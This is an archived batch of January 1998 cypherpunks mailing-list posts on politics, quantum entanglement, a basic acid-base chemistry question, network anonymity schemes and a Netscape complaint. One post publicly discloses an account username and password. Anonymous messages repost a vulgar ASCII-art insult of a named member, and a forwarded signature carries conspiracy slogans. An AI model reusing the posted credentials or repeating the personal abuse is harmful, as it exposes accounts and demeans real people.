>    OSLO, Norway (Reuters) - President Clinton, engulfed in asex scandal
>    and fighting for his political life, won anomination Tuesday for the
>    1998 Nobel Peace Prize from admirersof his foreign policy.
>    

[text deleted]


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 28 Jan 1998 12:48:17 +0800
To: cypherpunks@cyberpass.net
Subject: Re: ULotD? Cuban Tattoos.
In-Reply-To: <v04003903b0f40b1b9e35@[139.167.130.248]>
Message-ID: <v0400392cb0f45edd312f@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:58 pm -0500 on 1/27/98, Tim May wrote:


> Utter bullshit.

Agreed. On several levels of reference, I think...

> Extraordinary jokes require extraordinary proof.

Indeed. Hence my use of the word "apocrypha" to introduce it. And the
OxDEADBEEF list moderator's use of "ULotD", for, it seems, "Urban Legend of
the Day".

Note Perry Metzger's follow-on, which I also forwarded at the same time.
(You remember Perry, right? He liked to talk about cryptography here
once... Yeah, Tim, I know. You *knew* Perry Metzger, and, frankly, Mr.
Hettinga, yada, yada, yada)

<he said, ducking the usual .50 cal teleoperated sniper fire>

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvdi.net>
Date: Wed, 28 Jan 1998 15:46:14 +0800
To: Eric Cordian <cypherpunks@cyberpass.net
Subject: Re: Planetary rovers, SETI and other musings, was Re: update.356(fwd)
In-Reply-To: <v03102800b0f45774adc0@[208.129.55.202]>
Message-ID: <v03102803b0f490c22459@[208.129.55.202]>
MIME-Version: 1.0
Content-Type: text/plain



>This was discovered when the first experiments to verify the
>Einstein-Rosen-Podolsky effect were done.  You need the results of
>measurements on the opposite end to decrypt the information at the end you
>are at.

I guess I'm over my head in such matters.  From my, admitedly, shallow
understanding of wave function collapse, etc., I was under the apparent
misimpression that once collapsed (e.g., by Alice entangling a 'modulation'
photon M (of a known polarization) with one member (photon A) of an
entangled pair, one of which was sent to Alice and the other (photon B)
which was sent to Bob, photon B's polarization state was determined and
could not subsequently be altered by Bob's measurement with his receiver.
Could you recommend a good article which explain this paradox to a
non-quantum mechanic?

--Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvdi.net>
Date: Wed, 28 Jan 1998 15:49:37 +0800
To: Tim May <cypherpunks@cyberpass.net
Subject: Re: Planetary rovers, SETI and other musings, was Re: update.356 (fwd)
In-Reply-To: <v03102800b0f45774adc0@[208.129.55.202]>
Message-ID: <v03102805b0f492c99e4c@[208.129.55.202]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:34 PM -0800 1/27/98, Tim May wrote:
>At 7:56 PM -0800 1/27/98, Steve Schear wrote:
>>Of course one needn't stop there.  If entangled states could be stored for
>>several years, instantaneous communication with neighbooring stars is a
>>real possibility.  Coupled with advances in mind-machine science it might
>>someday be possible to explore, first-hand, our local portion of the galaxy
>>without leaving earth, or upload/download one's consciouness to vessels in
>>remote locations.
>
>Who's your supplier?

EPR Pharmaceuticals.  Want their address?

--Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ? the Platypus {aka David Formosa} <dformosa@st.nepean.uws.edu.au>
Date: Tue, 27 Jan 1998 22:36:41 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: State of the Union Address
In-Reply-To: <ZouyJe11w165w@bwalk.dm.com>
Message-ID: <Pine.LNX.3.93.980127235120.185B-100000@shirley>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 27 Jan 1998, Dr.Dimitri Vulis KOTM wrote:

> Rabid Wombat <wombat@mcfeely.bsfs.org> writes:

[...]

> > > > 11) Michelle mixes one gram of HCl and one half gram of NaOH. Under norma
> > > >     circumstances, what is produced and in what quantities?
> > >
> > > The correct answer is an explosion and a big mess.  One student in my high
> > > school chemistry class learned this the hard way.  :)
> > >
> >
> > Um, salt water explodes?
> 
> Where is Jim Bell when we need him?

The question depeands on what is normal circumstances?  Noramly HCl is
suppled dissolved in warter, where it will react quite safly with NaOH to
create salt warter.

However gassius HCl is a diffrent beast entirly,  but this is rare in a
high school enviroment.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBNM3ZKaQK0ynCmdStAQHTpwP/f8A4gxFNgA8LjKp7dc74DwQ1P+wota1v
0t476LJRpJh+iJporLYtyHVRwpwHv9vaxID8Y0hjMYQkgDp++oWDIgqA4m2/JV1V
WhXizo5Q97A0CnoMPCbLgOYb0VxXbbhFmdJ9MtwofOSaH8hBmtn0o9EOMTBCNgRo
eaCQkNxqMtk=
=5b8J
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "snow" <snow@smoke.suba.com>
Date: Wed, 28 Jan 1998 14:37:55 +0800
To: attila@primenet.com
Subject: Re: Clinton needs a war with Iraq
In-Reply-To: <19980125.091156.attila@hun.org>
Message-ID: <199801280634.AAA07810@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain



>     since the Korean war, American involvement in foreign wars,
>     or the war effort, has escalated in relationship to the
>     needs of the economy --the war effort boosts industrial
>     utilization --eg money and the economy-- and Americans vote
>     with their pocketbooks.

	World War II. 

>     I frankly dont believe you made that suggestion --the damage
>     would not be to the government, but to our fellow citizens
>     who have been ordered to commence action. I did not agree

	Not if used properly. It could properly be used to _delay_
engagement, or even avoid it.

	Besides, they (and I was one at one time) volunteered. Most every
one in the military now has had the chance to leave since Cliton took office.
Their continued enlistment is support.

>     regardless of the immorality and stupidity of Clinton, there
>     is no justification, and certainly no honour, for permitting
>     KIA American troops to be dumped into the spectacle of being
>     dragged through the streets of Somalia, etc.

	If those with the power were to make sure that they never got there,
then they couldn't be dragged thru the streets now could they?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Wed, 28 Jan 1998 17:07:58 +0800
To: cypherpunks@toad.com
Subject: Re: feedME account
In-Reply-To: <199801271349.IAA17868@thunder.ica.net>
Message-ID: <3.0.5.32.19980128013237.00884c00@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Normally I'd try to get the cypherpunks mailing list removed
from this mailing list, but a web-based open news reader 
looks like a useful thing to have, and it looks like
they try to do advertising on the web pages rather than
sending out lots of email.  

The password is limited to 8 characters, so it's now
	writecod
:-)

At 08:49 AM 1/27/98 -0500, you wrote:
>-----------------------------------------------------------
>            feedME - the world's easiest newsreader        
>                     http://www.feedME.org                 
>-----------------------------------------------------------
>
>Your Username is: cypherpunks
>Your Password is: kimkdqof
>
>If you have any problems, queries or suggestions please email:
>           admin@feedme.org
>
>You should change your password as soon as possible (if
>you haven't already done so), the address for changing it is:
>           http://www.feedme.org/changepass.html
>
>Remember that we don't allow anyone to SPAM through feedME,
>nor do we let people post any form of commerical or web-site
>advertisements - if you are unclear always mail admin.
>
>Regards,
>Michael Bennett
>Creator of feedME
>
>
>
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zooko Journeyman <zooko@xs4all.nl>
Date: Wed, 28 Jan 1998 08:47:33 +0800
To: apatrizi@cmp.com
Subject: No Subject
Message-ID: <199801280041.BAA19241@xs2.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain



(A letter to Andy Patrizio of TechWeb, www.techweb.com, Cc: to
cypherpunks@toad.com, malda@slashdot.org and gnu@gnu.org.  May
I remind the audience to use the technique which will benefit
your goals rather than harm them:  politeness.)



Sir,

I beg to differ regarding your assertion in
"http://www.techweb.com/wire/story/TWB19980126S0015" that open
source code has little value.  While your article makes the
very good point that a higher level of abstraction (the API
level) is a better platform for most "interoperation" or
"extension" uses, you omit several important considerations.
I will attempt to describe three of those considerations here.



The first consideraton is that open source code is of
unparalleled value in ensuring security and stability of a
complex system.


Witness the fact that when the Pentium "F00F" bug was
discovered last year, the Linux operating system had a fix
distributed within 7 calendar days, while Microsoft took more
than twice as long to issue a fix.


This is doubly important for mission-critical systems and
triply so for security-critical systems which may be subject to
hostile attack.  Indeed, many computer security professionals
of my acquaintance say that they _will_ _not_ use a system to
protect valuable data unless they and their peers are able to
examine the source code.



The second consideration is that an open software development
model can (sometimes) generate a surprising amount of quality
code at high speed.  The pre-eminent example of this phenomenon
is the Linux operating system, which in many ways has      
outstripped comparable proprietary operating systems in    
performance, features, stability, _and_ in time-to-market.



The third value in open source code is more controversial-- it
gives your users more control over the product.  An all-too-
common business tactic in the software industry is, as Scott
McNealy calls it, "proprietary lock-in", in which a company
deliberately makes their product incompatible with competing
products in order to ensure that the customer can't use that
product in conjunction with a competitor's product.  With the
current trend towards a convergence of interoperating software
products, this tactic is becoming increasingly oppressive to
customers.                                                   


This tactic is not possible with open source code,
because competitors, customers, or free-lance hackers can use
the open source in order to make the two products              
interoperable.                                               


Needless to say, not all in the business community would
consider this last feature to be a benefit.  (Although I think
that all in the business community would consider the first two
features to be a benefit.)



I hope that this letter has been of interest to you.  I have
been a software developer, industry-watcher, and open-source-
code enthusiast for years, and I was grieved to think that your
article might deter open-minded readers from considering the
full implications of an open source code strategy.


The idea of open source code has been a "fringe" concept for
decades (see seminal open-source advocate and hacker Richard
Stallman, www.fsf.org), and I'm delighted to think that with
Netscape's move, and with the rumored possibility that Sun will
open some of its Java source, that this idea could finally get
a fair hearing before the business community.


Regards,

Zooko, Journeyman Hacker

P.S.  Among software professionals that I know, the only ones
who make USD 100K/year or more are the ones who consider
themselves to be "hackers".  :-)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Wienke <JonWienk@ix.netcom.com>
Date: Wed, 28 Jan 1998 18:33:02 +0800
To: cypherpunks@cyberpass.net
Subject: RE: Latest Clinton dodge?
In-Reply-To: <3.0.5.32.19980127090723.008012c0@206.40.207.40>
Message-ID: <3.0.3.32.19980128020312.006b2420@popd.netcruiser>
MIME-Version: 1.0
Content-Type: text/plain



Years ago, when Clinton was primarily known for his frequent patronage of
McDonalds, he was affectionately known as "Mr. JoeBlob."  With the current
sex scandal(s), you can turn that around and it still fits...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@REPLAY.COM>
Date: Wed, 28 Jan 1998 10:32:45 +0800
To: cypherpunks@cyberpass.net
Subject: Re: State of the Union Address
Message-ID: <199801280225.DAA21669@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>Does anyone happen to know how to figure the energy requirements or yields
>for a reaction? 

Just to make sure I'm not misinterpreted, I mean how much energy is required
or is liberated by a given reaction. I don't mean "...figure the energy,
requirements, or yields," or "figure the energy requirements or products it
yields."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Graham-John Bullers <real@freenet.edmonton.ab.ca>
Date: Wed, 28 Jan 1998 19:27:50 +0800
To: Mix <mixmaster@remail.obscura.com>
Subject: Re: your mail
In-Reply-To: <199801271939.LAA19093@sirius.infonex.com>
Message-ID: <Pine.A41.3.95.980128042219.84486A-100000@fn2.freenet.edmonton.ab.ca>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 27 Jan 1998, Mix wrote:

rn

> The only `culture' Timothy `C' Maypole possesses is that 
> cultivated from his foreskin scrapings.
> 
>         ,/         \,
>        ((__,-,,,-,__)), Timothy `C' Maypole
>         `--)~   ~(--`
>        .-'(       )`-,
>        `~~`d\   /b`~~`
>            |     |
>            (6___6)
>             `---`
> 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Graham-John Bullers                      Moderator of alt.2600.moderated   
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    email : <real@freenet.edmonton.ab.ca> : <ab756@freenet.toronto.on.ca>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         http://www.freenet.edmonton.ab.ca/~real/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Graham-John Bullers <real@freenet.edmonton.ab.ca>
Date: Wed, 28 Jan 1998 19:28:11 +0800
To: Mix <mixmaster@remail.obscura.com>
Subject: Re: your mail
In-Reply-To: <199801271939.LAA19093@sirius.infonex.com>
Message-ID: <Pine.A41.3.95.980128042240.84486B-100000@fn2.freenet.edmonton.ab.ca>
MIME-Version: 1.0
Content-Type: text/plain



rn

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Graham-John Bullers                      Moderator of alt.2600.moderated   
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    email : <real@freenet.edmonton.ab.ca> : <ab756@freenet.toronto.on.ca>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         http://www.freenet.edmonton.ab.ca/~real/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Graham-John Bullers <real@freenet.edmonton.ab.ca>
Date: Wed, 28 Jan 1998 19:28:13 +0800
To: Mix <mixmaster@remail.obscura.com>
Subject: Re: your mail
In-Reply-To: <199801271939.LAA19093@sirius.infonex.com>
Message-ID: <Pine.A41.3.95.980128042324.84486D-100000@fn2.freenet.edmonton.ab.ca>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 27 Jan 1998, Mix wrote:

I think Vulis needs each of us to send ten copies of this back to him.

> The only `culture' Timothy `C' Maypole possesses is that 
> cultivated from his foreskin scrapings.
> 
>         ,/         \,
>        ((__,-,,,-,__)), Timothy `C' Maypole
>         `--)~   ~(--`
>        .-'(       )`-,
>        `~~`d\   /b`~~`
>            |     |
>            (6___6)
>             `---`
> 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Graham-John Bullers                      Moderator of alt.2600.moderated   
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    email : <real@freenet.edmonton.ab.ca> : <ab756@freenet.toronto.on.ca>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         http://www.freenet.edmonton.ab.ca/~real/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 28 Jan 1998 11:49:38 +0800
To: cypherpunks@toad.com
Subject: Re: State of the Union Address
Message-ID: <199801280338.EAA00309@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Another Anonymous writes:

>>Does anyone happen to know how to figure the energy requirements or yields
>>for a reaction? 
>
>Just to make sure I'm not misinterpreted, I mean how much energy is required
>or is liberated by a given reaction. I don't mean "...figure the energy,
>requirements, or yields," or "figure the energy requirements or products it
>yields."

It has been fifteen years since I even opened a chemistry book, but I think
what you're looking for is called the "heat of enthalpy." You could find
this in most any intro-level chem book, and there's probably a whole
shitload of reactions listed in the _CRC Handbook Of Chemistry & Physics_.

Since HCl+NaOH is an acid-base reaction, you could also use something
called the "heat of neutralization." IIRC, that's something like 57 KJ/mol
for strong acids. But don't take my word for it; I'm Not A Chemist Any
More. P-Chem gave me a great appreciation for math and computers.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Secret Squirrel <anon@squirrel.owl.de>
Date: Wed, 28 Jan 1998 13:06:23 +0800
To: cypherpunks@cyberpass.net
Subject: Re: State of the Union Address
Message-ID: <9368cd36f48cad9082a5752cc79eec8e@squirrel>
MIME-Version: 1.0
Content-Type: text/plain



>Well, if it was 40 grams of NaOH and 36.5 grams of HCl, then you
>would have 18 grams of water and 58.5 grams of NaCl.  With 1g HCl to
>.5g NaOH, well, you have an acidic, salty, mess.  However, HCl
>is a gas at STP, and NaOH is a solid...
>
>Basically, it's an incredibly poorly worded question.

It looks like the original poster grabbed two of the simplest acids and
bases he could find and plugged them into the question. 

HCl is usually provided in an aqueous solution. NaOH is a solid. In those
two states they'll combine quite well with each other. The "explosion and a
big mess" would come from somebody just chucking a lot of both chemicals
together without any regard what is going on. 

I think Anonymous was more interested in what products were produced and how 
much of each were produced, and then made the mistake of assuming that the
chemist had enough brains not to go chuck two reactive chemicals together
without the competence to run through the necessary calculations. 

Throwing together any amount of any chemicals without knowing what you're
doing is a very bad idea. It's a good way to "accidentally" produce chlorine
gas, carbon monoxide, or worse. If you don't know what you're doing or you
aren't at least minimally competent and take appropriate safety precautions,
keep it on paper.

Personally, I steer clear of college and high school chemistry labs for this
reason. I watched some idiot produce chlorine gas back in high school,
though thankfully not in any really, really dangerous quantities.

NaOH + HCl ---> NaCl + H O
                        2
			
It's a nice, simple reaction. To answer the question the student would have
to know the atomic masses of chlorine, hydrogen, oxygen, and sodium, but
that could easily be gleaned off a periodic table provided the student was
competent enough to ask for one if he needed it. 

I doubt most college chemistry professors would analyze it that well either,
to tell you the truth. They'd give the question and it's assumed that the
necessary steps are taken to ensure a reaction (if any). Of course "normal
circumstances" is kind of a wide area.

The question should have been worded more like this:

11) Michelle mixes one gram of HCl and one half gram of NaOH. The HCl is
dissolved in water. Assuming that Michelle is competent enough to avoid
blowing herself across the room or destroying the lab, what are the products
and in what quantities are they produced?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Wed, 28 Jan 1998 12:36:18 +0800
To: Tim May <tcmay@got.net>
Subject: Re: future proofing algorihtms
In-Reply-To: <v03102805b0f4501f35a7@[207.167.93.63]>
Message-ID: <Pine.BSF.3.96.980128051852.23935B-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 27 Jan 1998, Tim May wrote:
> A LAM approach is low tech, and can be implemented easily enough. (And
> PipeNet becomes much more feasible...)

I agree.

> Even an adventurous company, with many machines on various networks, could
> deploy a LAM on their network.

There are several such companies outside the US that I can think of.

> (Though the laws about corporate culpability are written in ways that a
> Silicon Graphics or Sun or C2Net would have much to fear in having their
> corporate network associated with a LAM of any sort. Hence my point about
> many and varied residential users in a physical building being the LAM
> nodes.)

Sure. A LAM would not happen at any of the above companies. But there are
several non-US ISP's and other outfits with triple fiber to the backbone
that could set this up. [You know who I am talking about, lurkers. :-) How
about it]?

> Another point about LAMs is that they are useful as "concentrators" for
> PipeNet connections. To wit,
> 
> Suppose someone has deployed a PipeNet connection to another node. Fine,
> but the NSA and Mossad and GCHQ and other enemies of freedom may watch the
> traffic flowing into the node feeding that PipeNet connection.
> 
> So why not do a better job of "loading" this PipeNet connection by having a
> LAM at the site? Then, watchers see the stuff flowing into the LAM, and
> have less idea (correlation-wise) of what's then making use of the PipeNet
> connection.

That setup would work even better if operated by a major ISP. If you run
10% of a country's (and be it a small country) IP traffic through a LAM,
the computations an attacker has to perform become complex to the point of
being intractable. Especially if the ISP runs dial-up. [Lurkers, your
thoughs please]?

Of course we won't see such sites until somebody writes the
software.

Cypherpunks write code,
-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.
   "Tonga? Where the hell is Tonga? They have Cypherpunks there?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Wed, 28 Jan 1998 12:38:48 +0800
To: cypherpunks@cyberpass.net
Subject: Re: State of the Union Address
In-Reply-To: <8463c019601705d91ebc98ca08ee4e29@anon.efga.org>
Message-ID: <Pine.BSF.3.96.980128053707.23935C-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



Get a Chemisty 101/2 book. You must have been in the bone head chemistry
class.

On Tue, 27 Jan 1998, Anonymous wrote:

> >I guess those high school students aren't the only ones with no clear
> >idea of the way the world works.  While salt water does not ordinarily
> >explode, in this case salt water is the ultimate product -- but massive
> >heat released when acids and bases join and recombine to produce salts
> >(in this case table salt) and water.
> 
> Interesting thread. While we're on the topic of chemistry and heat:
> 
> Does anyone happen to know how to figure the energy requirements or yields
> for a reaction? My college chemistry book doesn't say a whole lot about it.
> In fact it doesn't say enough to actually be useful at all; it gives
> energies for four or five different bonds in a table and then launches into
> a really bad explanation of how to calculate this. 
> 
> If I have to use a table of bond energies is there one available online? Or
> is there a simpler way to just calculate the bloody things?
> 
> I really ought to take more chemistry courses before I get my diploma. Or at
> the very least audit them.
> 
> 


-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.
   "Tonga? Where the hell is Tonga? They have Cypherpunks there?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amp@pobox.com
Date: Wed, 28 Jan 1998 14:49:38 +0800
To: cypherpunks@cyberpass.net
Subject: Fw: Congratulations, Bill, You've WON! Netscape Recommends Explorer!
In-Reply-To: <199801271704.LAA18643@lawgiver.megacity.org>
Message-ID: <Chameleon.885987977.amp@rcnu3077>
MIME-Version: 1.0
Content-Type: text/plain



FYI. 

------------------------
  From: Linda Thompson <lindat@megacity.org>
  Subject: Congratulations, Bill, You've WON! Netscape Recommends Explorer! 

  Date: Tue, 27 Jan 1998 11:04:00 -0600 
  To: amp@pobox.com
  Cc: news@aen.org, chat@aen.org


Will you please forward this to cypherpunks and anyplace else that might
find it interesting?  Thanks.


Today, I called Netscape because of a problem with it being unable to play
.wav files on a webpage (without a plug-in).  I am using Netscape Gold 
3.03.

I won't get 3.04 after reading about it's new "fixes" that say NOT to use a
~ for webpage addresses, but instead, to use /./ -- Is anyone in their 
right
mind going to try that on their webpages?  I've got about 40 megs of
webpages and I'm NOT going to reconfigure them because Netscape's
programmers are a bunch of jackasses.

I configured Netscape's helper applications menu to use mplayer, which is
bundled with Windows, and then tried to use it to browse my own webpage,
with a .wav file on it.

(1)  Netscape would not save the configuration of mplayer in the helper
applications settings.  Mplayer would stay in the configuration for that
session, but upon exiting to DOS and reloading Windows and Netscape, the
setting would no longer be present.

(2)  If I didn't check to see that mplayer was still set up in the Netscape
helper applications configuration, and browsed the page with the .wav file,
I would get a message from Netscape "Unable to play .wav file."

In the meantime, Netscape WIPED OUT all my sound drivers in memory.  They
were still present in the windows/system directory, but had to be (1)
reloaded through Windows Utilities; (2) reloaded through Soundblaster
utilities in DOS and (3) I had to do a cold reboot to get them to work again.

THEN I found that the volume on the mixer that comes with Windows, had been
set to "0" by Netscape.

Since I could duplicate these results, repeatedly, it appeared to be a bug.


I called Netscape about it.

GRADY WILSON AT NETSCAPE TOLD ME TO USE INTERNET EXPLORER.

First he told me to reinstall Netscape (already did that).
Then he told me to get Netscape 3.04.  I told him I wouldn't and I wanted to
know why Netscape out of the box, which is SUPPOSED to play a .wav file,
wouldn't play a .wav file and wouldn't save the configuration.  He said it
would, and I said obviously it doesn't, or I wouldn't be calling, and why
else would Netscape have to have a blue million "plug ins."

Next he said "mplayer" was corrupt (it isn't and works fine, even with
Netscape, so long as Netscape hasn't yet deleted its own configuration
setting mplayer to play .wav files).  I told him this.

That is when 

GRADY WILSON AT NETSCAPE TOLD ME TO USE INTERNET EXPLORER.

So, congratulations, Bill, you've won.  NETSCAPE ITSELF is now telling
people to get Explorer.


             ************  V  *****************
  DEATH TO THE NEW WORLD ORDER 
            **********************************

Remember Waco.  The Murderers are still free
       (and running YOUR country.)
See the proof: http://www.Public-Action.com/SkyWriter/WacoMuseum
*********************************

My son, David, has been missing since Sept. 19, 1997.  Please help us find
him.  





---------------End of Original Message-----------------

===
E-mail: amp@pobox.com
Date: 01/28/98
Time: 06:45:54
Visit me at http://www.pobox.com/~amp

     -export-a-crypto-system-sig -RSA-3-lines-PERL
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)

Have you seen  http://www.public-action.com/SkyWriter/WacoMuseum
===






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 28 Jan 1998 22:31:53 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Planetary rovers, SETI and other musings, was Re: update.356 (fwd)
Message-ID: <199801281428.IAA06743@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 27 Jan 1998 23:44:50 -0800
> From: Steve Schear <schear@lvdi.net>
> Subject: Re: Planetary rovers, SETI and other musings, was Re: update.356
>  (fwd)

> I guess I'm over my head in such matters.  From my, admitedly, shallow
> understanding of wave function collapse, etc., I was under the apparent
> misimpression that once collapsed (e.g., by Alice entangling a 'modulation'
> photon M (of a known polarization) with one member (photon A) of an
> entangled pair, one of which was sent to Alice and the other (photon B)
> which was sent to Bob, photon B's polarization state was determined and
> could not subsequently be altered by Bob's measurement with his receiver.
> Could you recommend a good article which explain this paradox to a
> non-quantum mechanic?

The state is determined *at the time of collapse*. Once the collapse occurs
the synchronization is no longer present and subsequent events can indeed
alter the polarization of one particle without altering the other. Simply
bouncing that photon via refraction off a surface can alter the
polarization.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Roger J Jones" <cyber@ibpinc.com>
Date: Wed, 28 Jan 1998 23:25:33 +0800
To: <cypherpunks@cyberpass.net>
Subject: Tim May as censor??????????
In-Reply-To: <v03102803b0f44d6a92d6@[207.167.93.63]>
Message-ID: <199801281519.JAA04493@pc1824.ibpinc.com>
MIME-Version: 1.0
Content-Type: text/plain



>Jeez, this is not "ChemPunks."

>Calculating exothermic and endothermic yields (measured in "kcal/mole") for
>various chemistry reactions was a central part of my sophomore chemistry
>class in high school 30 years ago.

>I suggest the question askers consult any of the most basic chemistry
>textbooks.

>--Tim May

Tim,
Can this be? Censorship from the man on the mountain? So unlike you......







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 28 Jan 1998 19:17:41 +0800
To: alan@clueserver.org
Subject: typo in tattoo (Re: ULotD? Cuban Tattoos.)
In-Reply-To: <3.0.5.32.19980127214312.03fd8160@clueserver.org>
Message-ID: <199801280949.JAA00421@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Alan Olsen <alan@clueserver.org> writes:
> At 05:14 PM 1/27/98 -0500, Robert Hettinga wrote:
> 
> >From: "Perry E. Metzger" <perry@piermont.com>
> >
> >
> >The story posted is an urban legend.
> >
> >It is NOT an urban legend that someone has been tattooed with "RSA in
> >Perl". A picture of Richard White's tattoo is at:
> >
> >http:/www.dcs.ex.ac.uk/~aba/rsa/tattoo.html
> 
> It is also true that he had a typo in the tattoo.  It seems someone, who
> will remain unnamed, joked about "what if it has a typo, is it still a
> violation of ITAR?".  Seems they decided to proof read it.  "Doh!"

There was a typo in the tattoo, fortunately it was correctable, they
missed out a backtick (`).  You can see this on the tattoo gif
referenced above:

